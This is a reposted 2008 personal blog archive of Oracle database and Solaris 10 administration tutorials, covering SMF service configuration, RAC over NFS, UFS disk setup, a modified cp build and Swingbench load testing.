Sunday, November 30, 2008

It's Been a While

I had removed this blog, but I kept getting emails asking for links to certain posts, so I have reposted some of the old posts so that they are available to anyone who is interested in them.

As an update on what I'm doing: I'm currently in my second year of graduate school. I plan on taking a grad class in database systems next semester, so I'll get to learn a lot about database theory. The class uses Stonebraker's 'Readings in Database Systems' as a textbook along with some more modern research papers, so it should be a fun class.

I doubt I will update this much but you never know, stranger things have happened...

Configuring Oracle as a Service in SMF

In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify management of system services. It is one component of the so-called Predictive Self-Healing technology available in Solaris 10; the other component is the Fault Management Architecture.

In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. Among other things, this means that Oracle will start automatically on boot, so we don't need to go to the bother of writing a startup script for Oracle (not that it's really that hard; see Howard Rogers' 10gR2 installation guide on Solaris for an example). A traditional startup script could still be created and placed in the appropriate /etc/rc*.d directory, but such scripts are treated as legacy run services in Solaris 10 and do not benefit from the precise fault management provided by SMF.
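
For reference, legacy rc scripts show up in svcs(1) output with an lrc: FMRI and a state of legacy_run; a hypothetical dbora script placed in /etc/rc3.d would appear something like this (timestamp illustrative):

# svcs -a | grep dbora
legacy_run     10:03:42 lrc:/etc/rc3_d/S99dbora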

Note that I am only talking about a single-instance environment here, and I am not using ASM for storage. Also, please note that this post is not an extensive guide by any means; it's just a short post on how to get things working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at http://docs.sun.com.

Adding Oracle as a Service

To create a new service in SMF, a number of steps need to be performed (see the Solaris Service Management Facility - Service Developer Introduction for more details). Luckily for me, Joost Mulders has already done the necessary work for Oracle. The package for installing ora-smf is available from here.

To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:


# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd -d orasmf-1.5.pkg

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory; the following files will be present there:

# ls -l
-r--r--r-- 1 root bin 2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r-- 1 root bin 5722 Dec 28 2005 oracle-database-service.xml
-r--r--r-- 1 root bin 2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r-- 1 root bin 4295 Dec 28 2005 oracle-listener-service.xml
#
The two files which must be edited are:
  • oracle-database-instance.xml
  • oracle-listener-instance.xml
My oracle-database-instance.xml file looked like the following after I edited it according to my environment:

<service_bundle type='manifest' name='oracle-database-instance'>
  <service
    name='application/oracle/database'
    type='service'
    version='1'>

    <!-- The SMF instance name MUST match the database instance -->
    <instance name='orcl1' enabled='false'>
      <method_context
        working_directory='/u01/app/oracle/product/10.2.0/db_1'
        project='oracle'
        resource_pool=':default'>

        <!--
          The credentials of the user with which the method is executed.
        -->
        <method_credential
          user='oracle'
          group='dba'
          supp_groups=':default'
          privileges=':default'
          limit_privileges=':default'/>

        <method_environment>
          <envvar name='ORACLE_SID' value='orcl1' />
          <envvar name='ORACLE_HOME' value='/u01/app/oracle/product/10.2.0/db_1' />

          <!--
            For Oracle 8 & 9
            <envvar name='ORA_NLS33' value='' />
            For Oracle 10g
            <envvar name='ORA_NLS10' value='' />
          -->

        </method_environment>
      </method_context>

    </instance>
  </service>
</service_bundle>

And my oracle-listener-instance.xml file looked like so after editing:

<service_bundle type='manifest' name='oracle-listener-instance'>
  <service
    name='application/oracle/listener'
    type='service'
    version='1'>

    <!-- The SMF instance name MUST match the listener instance -->
    <instance name='LISTENER' enabled='false'>
      <method_context
        working_directory='/u01/app/oracle/product/10.2.0/db_1'
        project='oracle'
        resource_pool=':default'>

        <!--
          The credentials of the user with which the method is executed.
        -->
        <method_credential
          user='oracle'
          group='dba'
          supp_groups=':default'
          privileges=':default'
          limit_privileges=':default'/>

        <method_environment>
          <envvar name='ORACLE_HOME' value='/u01/app/oracle/product/10.2.0/db_1' />

          <!--
            For Oracle 8 & 9
            <envvar name='ORA_NLS33' value='' />
            For Oracle 10g
            <envvar name='ORA_NLS10' value='' />
          -->

        </method_environment>
      </method_context>

    </instance>
  </service>
</service_bundle>

In the configuration files above, you can see that I have an instance (orcl1) whose ORACLE_HOME is /u01/app/oracle/product/10.2.0/db_1. I also have a resource project named oracle, and the Oracle software was installed as the oracle user and the dba group. The most important parameters which must be changed according to your environment are:
  • ORACLE_HOME
  • ORACLE_SID
  • User
  • Group
  • Project
  • Working Directory (in my case, I set it to the same value as ORACLE_HOME)
  • Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)
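
Before importing the edited manifests, it's worth checking that they are still well-formed; svccfg has a validate subcommand for this:

# svccfg validate /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg validate /var/svc/manifest/application/database/oracle-listener-instance.xml
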
Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:

# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml

Now, shut down the database and listener on the host. (This post presumes you are only configuring one database and listener, although it shouldn't be too difficult to configure multiple instances.) Then execute the following to enable the database and listener as SMF services and start them:

# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER
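
If all went well, both services should now report as online; a quick sanity check (timestamps illustrative):

# svcs -a | grep oracle
online         10:42:11 svc:/application/oracle/database:orcl1
online         10:42:15 svc:/application/oracle/listener:LISTENER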

In the svcadm commands above, the database instance is orcl1 and the listener name is LISTENER. Logs for these services are available in the /var/svc/log directory.

# cd /var/svc/log
# ls -ltr application-*
-rw-r--r-- 1 root root 45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r-- 1 root root 120 Apr 25 20:15 application-print-server:default.log
-rw-r--r-- 1 root root 45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r-- 1 root root 75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r-- 1 root root 566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r-- 1 root root 603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r-- 1 root root 3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r-- 1 root root 6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#

Testing Out SMF

Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.

# ps -ef | grep pmon
oracle 5113 1 0 10:19:22 ? 0:01 ora_pmon_orcl1
# kill -9 5113

Roughly 10 to 20 seconds later, the database came back up. Looking at the application-oracle-database:orcl1.log file, we can see what happened:

[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method ("/lib/svc/method/ora-smf stop database orcl1") ]
*********************************************************************
*********************************************************************
** some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method "stop" exited with status 0 ]
[ Apr 26 10:44:53 Executing start method ("/lib/svc/method/ora-smf start database orcl1") ]
ORACLE instance started.
Total System Global Area 251658240 bytes
Fixed Size 1279600 bytes
Variable Size 83888528 bytes
Database Buffers 163577856 bytes
Redo Buffers 2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method "start" exited with status 0 ]
As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!

Now, let's try out the same procedure with the listener service.
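
The listener runs as the tnslsnr binary, so the equivalent test is to kill that process; something along these lines (PID illustrative):

# ps -ef | grep tnslsnr
oracle 5121 1 0 10:19:25 ? 0:00 /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr LISTENER -inherit
# kill -9 5121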

Almost instantaneously, the listener came back up. Looking through the application-oracle-listener:LISTENER.log file shows us what SMF did:

[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method ("/lib/svc/method/ora-smf stop listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle. All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method "stop" exited with status 0 ]
[ Apr 26 10:47:52 Executing start method ("/lib/svc/method/ora-smf start listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle. All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date 26-APR-2007 10:47:54
Uptime 0 days 0 hr. 0 min. 0 sec
Trace Level off
Security ON: Local OS Authentication
SNMP OFF
Listener Parameter File /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method "start" exited with status 0 ]
I haven't really played around with much else in SMF and Oracle at the moment. Obviously, Oracle already provides a lot of this functionality through Enterprise Manager using corrective actions.

Also, it's worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.

Saturday, November 29, 2008

srvctl Error in Solaris 10 RAC Environment

If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (which is the recommended method in Solaris 10), then you will likely encounter issues when trying to start the cluster database or an individual instance using the srvctl utility. For example, this is likely what you will see:


$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$

along with the following messages in the alert log

Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent

This is because the srvctl utility does not pick up the shared memory settings configured in the resource project (which prctl would show); instead, it reads the settings from the /etc/system file. This is documented in bug 5340239 on Metalink.

The only workaround for this at the moment (that I know of) is to manually add the necessary shm parameters to the /etc/system file, for example:

set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100
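
As an aside, the values actually configured through the resource project can still be inspected with prctl; for example, assuming the project is named oracle:

# prctl -n project.max-shm-memory -i project oracle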

Building a Modified cp Binary on Solaris 10

I thought I would write a post on how I set up my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10, in case anyone arrives here from Kevin Closson's blog. If you are looking for more background information on why I am performing this modification, have a look at this post by Kevin Closson.

GNU Core Utilities

We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the GNU Core Utilities.

Download the software to an appropriate location on your system.

Modifying the Code

Untar the code first on your system.

# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar

Proceed to the coreutils-5.2.1/src directory. Open the copy.c file with an editor. The following are the differences between the modified copy.c file and the original copy.c file:

# diff -b copy.c.orig copy.c
287c315
< buf_size = ST_BLKSIZE (sb);
---
> /* buf_size = ST_BLKSIZE (sb); */
288a317,319
>
> buf_size = 8388608 ;
>

Building the Binary

To build the modified cp binary, navigate first to the coreutils-5.2.1 directory. Then enter the following (ensure that the gcc binary is in your PATH first; it is located at /usr/sfw/bin/):

# ./configure
# /usr/ccs/bin/make

We don't want to do make install, as is usual when building something from source like this, because it would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the coreutils-5.2.1/src directory like so:

# cp coreutils-5.2.1/src/cp /usr/bin/cp8m
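
The modified binary can then be invoked explicitly whenever the 8 MB buffer is wanted; for instance (paths purely illustrative):

# /usr/bin/cp8m /u02/oradata/orcl/system01.dbf /u03/backup/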

Results of using the Modified cp

See Kevin Closson's post on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.

Oracle 10gR2 RAC with Solaris 10 and NFS

Recently, I setup a 2 node RAC environment for testing using Solaris 10 and NFS. This environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.

I thought it might prove useful to create a post on how this is achieved, as I found it to be a relatively quick way to set up a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.

This post will only detail the steps which are specific to this setup, meaning I won't talk about a number of steps which need to be performed, such as setting up user equivalence and creating the database. I will mention when these steps should be performed, but I point you to Jeffrey Hunter's article on building a 10gR2 RAC on Linux with iSCSI for more information on steps like these.

Overview of the Environment

Here is a diagram of the architecture used, which is based on Jeff Hunter's diagram from the previously mentioned article:



You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.

Again, the hardware used is exactly the same as the hardware used in Jeff Hunter's article. Notice, however, that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

Getting Started

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website here. You will need a Sun Online account to access the downloads but registration is free and painless.

I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found here.

When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.

After installation, you should update the /etc/inet/hosts file on all hosts. For my environment as shown in the diagram above, my hosts file looked like the following:


#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer

The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are udp_recv_hiwat and udp_xmit_hiwat. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.

To see what these parameters are currently set to, perform the following:

# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344

To set the values of these parameters to 65536 bytes in current memory, perform the following:

# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536

Now, we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that these parameters are set on boot if they are placed in the /etc/system file; values placed in /etc/system have no effect on Solaris 10. Bug 5237047 has more information on this.

So what we will do is create a startup script called udp_rac in /etc/init.d. This script has the following contents:

#!/sbin/sh
case "$1" in
'start')
        ndd -set /dev/udp udp_xmit_hiwat 65536
        ndd -set /dev/udp udp_recv_hiwat 65536
        ;;
'state')
        ndd /dev/udp udp_xmit_hiwat
        ndd /dev/udp udp_recv_hiwat
        ;;
*)
        echo "Usage: $0 { start | state }"
        exit 1
        ;;
esac

Now, we need to create a link to this script in the /etc/rc3.d directory:

# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac
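
Once linked in, the script can also be run by hand using its state argument to confirm the settings took; given the script above, the expected output is:

# /etc/init.d/udp_rac state
65536
65536
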
Configuring the NFS Filer

Now that we have Solaris installed on all our machines, it's time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive, you can ignore the next paragraph.

In my previous post, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to follow that post exactly, so if you perform what I mention there, you will have a UFS file system ready for mounting.

Now, I have a UFS file system created on the /dev/dsk/c2t0d0s0 device. I will create a directory for mounting this file system and then mount it:

# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac
Now that we have created the base directory, let's create directories inside it which will contain the various files for our RAC environment.

# cd /export/rac
# mkdir crs_files
# mkdir oradata

The /export/rac/crs_files directory will contain the OCR and the voting disk files used by Oracle Clusterware. The /export/rac/oradata directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.

Obviously, this setup is not ideal since everything is on the same device, but for this environment I didn't care; all I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step, but I'm lazy...

Now we need to make these directories accessible to the Oracle RAC nodes, which I will accomplish using NFS. We first need to edit the /etc/dfs/dfstab file to specify which directories we want to share and which options we want to use when sharing them. The dfstab file I configured looked like so:

# Place share(1M) commands here for automatic execution
# on entering init state 3.
#
# Issue the command 'svcadm enable network/nfs/server' to
# run the NFS daemon processes and the share commands, after adding
# the very first entry to this file.
#
# share [-F fstype] [ -o options] [-d ""] [resource]
# .e.g,
# share -F nfs -o rw=engineering -d "home dirs" /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata

The anon option in the dfstab file, as shown above, is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.

After editing the dfstab file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:

# svcadm restart nfs/server
To check if the directories are exported correctly, the following can be performed from the NFS filer:

# share
- /export/rac/crs_files rw,anon=175 ""
- /export/rac/oradata rw,anon=175 ""
#

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (solaris1 and solaris2 in my case):

# dfshares solaris-filer
RESOURCE SERVER ACCESS TRANSPORT
solaris-filer:/export/rac/crs_files solaris-filer - -
solaris-filer:/export/rac/oradata solaris-filer - -
#

The output should be the same on both nodes.

Configure NFS Exports on Oracle RAC Nodes

Now we need to configure the NFS exports on the two nodes in the cluster. First, we must create directories where we will be mounting the exports. In my case, I did this:

# mkdir /u02
# mkdir /u03

I am not using /u01 as I'm using that directory for installing the software. I will not be configuring a shared Oracle home in this article, as I wanted to keep things as simple as possible, but that might make a good future blog post.

For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The mount command which I used to manually mount these exports is as follows:

# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03

Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the /etc/vfstab file. The extra lines which I added to the /etc/vfstab file on both nodes were (each entry is a single line in the actual file):

solaris-filer:/export/rac/crs_files - /u02 nfs - yes rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata - /u03 nfs - yes rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3

Configure the Solaris Servers for Oracle

Now that we have shared storage set up, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and the configuration assistants (such as NETCA) look for the SSH binaries in the wrong location on Solaris; even if the SSH binaries are included in your PATH when you start these programs, they will still look in the wrong location. On Solaris, the SSH binaries are located in the /usr/bin directory by default, so the OUI will throw an error stating that it cannot find the ssh or scp binaries. My workaround was to create symbolic links to these binaries in the /usr/local/bin directory:

# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp

You should also create the oracle user and directories now before configuring kernel parameters.

For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to this excellent installation guide for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

What's Left to Do

From here on in, it's quite easy to follow Jeff Hunter's article. Obviously, you won't be using ASM, so the only differences between what to do now and what he has documented are file locations. You can follow along from section 14 and you should be able to get a 10gR2 RAC environment up and running. Obviously, there are some sections, such as setting up OCFS2 and ASMLib, that can be left out since we are installing on Solaris and not Linux.

Creating a UFS File System on an External Hard Drive with Solaris 10

Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files, and I was going to use the drive exclusively with one of my Solaris systems. I didn't find much information on the web about how to do this with Solaris (maybe I wasn't searching very well or something), so I thought I would post the procedure I followed here so I'll know how to do it again if I need to.

After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the /var/adm/messages file. With the hard drive I was using, I saw entries like the following:


Mar 2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2usb0 at bus address 2
Mar 2 13:10:33 solaris-filer usba: [ID 349649 kern.info] Maxtor OneTouch II L60LHYQG
Mar 2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar 2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 (scsa2usb0) online
Mar 2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0

The dmesg command could also be used to see similar information. Alternatively, we could use the rmformat command (which lists removable media) to see this information in a much nicer format, like so:

# rmformat -l
Looking for devices...
1. Logical Node: /dev/rdsk/c1t0d0p0
Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
Connected Device: QSI CDRW/DVD SBW242U UD25
Device Type: DVD Reader
2. Logical Node: /dev/rdsk/c2t0d0p0
Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
Connected Device: Maxtor OneTouch II 023g
Device Type: Removable
#

Now that we know the drive has been identified by Solaris (as /dev/rdsk/c2t0d0p0), we need to create one Solaris partition that uses the whole disk (this is Solaris 10 running on the x86 architecture). This is accomplished by passing the -B flag to the fdisk command, like so:

# fdisk -B /dev/rdsk/c2t0d0p0

Now we will print the disk table to standard out like so:

# fdisk -W - /dev/rdsk/c2t0d0p0

This will output the following information to the screen for the hard drive I am using:


* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
* 512 bytes/sector
* 63 sectors/track
* 255 tracks/cylinder
* 36483 cylinders
*
* systid:
* 1: DOSOS12
* 2: PCIXOS
* 4: DOSOS16
* 5: EXTDOS
* 6: DOSBIG
* 7: FDISK_IFS
* 8: FDISK_AIXBOOT
* 9: FDISK_AIXDATA
* 10: FDISK_OS2BOOT
* 11: FDISK_WINDOWS
* 12: FDISK_EXT_WIN
* 14: FDISK_FAT95
* 15: FDISK_EXTLBA
* 18: DIAGPART
* 65: FDISK_LINUX
* 82: FDISK_CPM
* 86: DOSDATA
* 98: OTHEROS
* 99: UNIXOS
* 101: FDISK_NOVELL3
* 119: FDISK_QNX4
* 120: FDISK_QNX42
* 121: FDISK_QNX43
* 130: SUNIXOS
* 131: FDISK_LINUXNAT
* 134: FDISK_NTFSVOL1
* 135: FDISK_NTFSVOL2
* 165: FDISK_BSD
* 167: FDISK_NEXTSTEP
* 183: FDISK_BSDIFS
* 184: FDISK_BSDISWAP
* 190: X86BOOT
* 191: SUNIXOS2
* 238: EFI_PMBR
* 239: EFI_FS
*

* Id Act Bhead Bsect Bcyl Ehead Esect Ecyl Rsect Numsect
191 128 0 1 1 254 63 1023 16065 586083330

We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sector (512 in my case) by the number of sectors listed at the bottom of the output shown above. We then divide this number by 1024*1024 to yield MB.

So in my case, this works out as (512 * 586083330) / (1024 * 1024) = 286173.5009765625 MB.

Now, we need to set up a partition table file. This is a regular text file and you can name it whatever you like; for the sake of this post, I will name it disk_slices.txt. The contents of this file are:

slices: 0 = 2MB, 286170MB, "wm", "root" :
1 = 0, 1MB, "wu", "boot" :
2 = 0, 286172MB, "wm", "backup"

To create these slices on the disk, we run:

# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C
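
Before creating a file system, the new slice layout can be double-checked by printing the VTOC from the backup slice; for example:

# prtvtoc /dev/rdsk/c2t0d0s2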

To create the UFS file system on the newly created slice, I ran the following (the output from the command is also shown):

# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0: 586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#

And now I'm finished; I have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I can just:

# mount -F ufs /dev/dsk/c2t0d0s0 /u01
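
If I wanted this file system mounted automatically at boot, a line along the following lines could be added to /etc/vfstab (the fsck pass and mount point here are just my choices):

/dev/dsk/c2t0d0s0 /dev/rdsk/c2t0d0s0 /u01 ufs 2 yes -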

Tuesday, November 25, 2008

Playing with Swingbench

Swingbench is a free load generator (and benchmark suite) designed by Dominic Giles to stress test an Oracle database. In this post, I will be playing with Swingbench and showing how it can be used. The article will focus on comparing the performance of buffered I/O versus un-buffered I/O (i.e. direct I/O) using the Swingbench tool. Since this article is not about direct I/O (I encourage the interested reader to have a look here for more information on that topic), any results presented here should not be considered conclusive. The results are very simple and should not be taken too seriously; the main point of this article is to demonstrate the Swingbench utility: how to set it up and use it.

A Note About the Environment Used for Testing

Before we delve into using Swingbench, I should mention a little about the environment used for testing, as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1 GB of RAM, running Solaris 10 (specifically the 11/06 release). The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.

The datafiles for the database reside on an 80 GB partition which is formatted with a UFS filesystem, and the redo logs reside on a 20 GB partition which is also formatted with UFS. The database is not running in archive log mode and there is no flash recovery area configured.

Enabling Direct I/O


One quick note on how we will be enabling direct I/O for testing purposes. The UFS file system (like most file systems) supports mount options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount it with the forcedirectio mount option, like so:


# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02


Another possible method is setting the FILESYSTEMIO_OPTIONS=SETALL parameter within Oracle (available in 9i and later). As Glenn Fawcett states in his excellent post on direct I/O, the SETALL value for the FILESYSTEMIO_OPTIONS parameter sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set, Oracle uses an API to enable direct I/O when it opens database files.
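
For reference, this is roughly how the parameter would be set from a shell; it is a static parameter, so SCOPE=SPFILE and an instance restart are required:

$ sqlplus -s "/ as sysdba" <<EOF
ALTER SYSTEM SET filesystemio_options = SETALL SCOPE=SPFILE;
EOF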

Swingbench Installation and Configuration

Now that we've got the preliminaries out of the way, it's time to get on to the main reason for this post. The Swingbench code ships as a zip file which can be downloaded from here. A prerequisite for running Swingbench is that a Java virtual machine be present on the machine on which you will be running Swingbench.

After unzipping the Swingbench zip file, you will need to edit the swingbench.env file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment:
  • ORACLE_HOME
  • JAVA_HOME
  • SWINGHOME
If you are using the Oracle Instant Client software instead of a full RDBMS install on the machine running Swingbench, the CLASSPATH variable must also be modified from $ORACLE_HOME/jdbc/lib/ojdbc14.jar to $ORACLE_HOME/lib/ojdbc14.jar.
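
As an illustration, the relevant lines in swingbench.env might end up looking something like the following (the paths are from my environment and the exact variable layout may differ between Swingbench versions):

ORACLE_HOME=/u01/app/oracle/product/10.2.0/db_1
JAVA_HOME=/usr/java
SWINGHOME=/export/home/oracle/swingbench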

Installing Calling Circle

Calling Circle is an open-source, preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench, but for the purposes of this article we will only discuss the Calling Circle benchmark.

The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97% of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.

The first step in installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the ccwizard executable found in the swingbench/bin directory.


$ ./ccwizard


Click [Next] on the welcome screen and you will then be presented with the screen shown below:



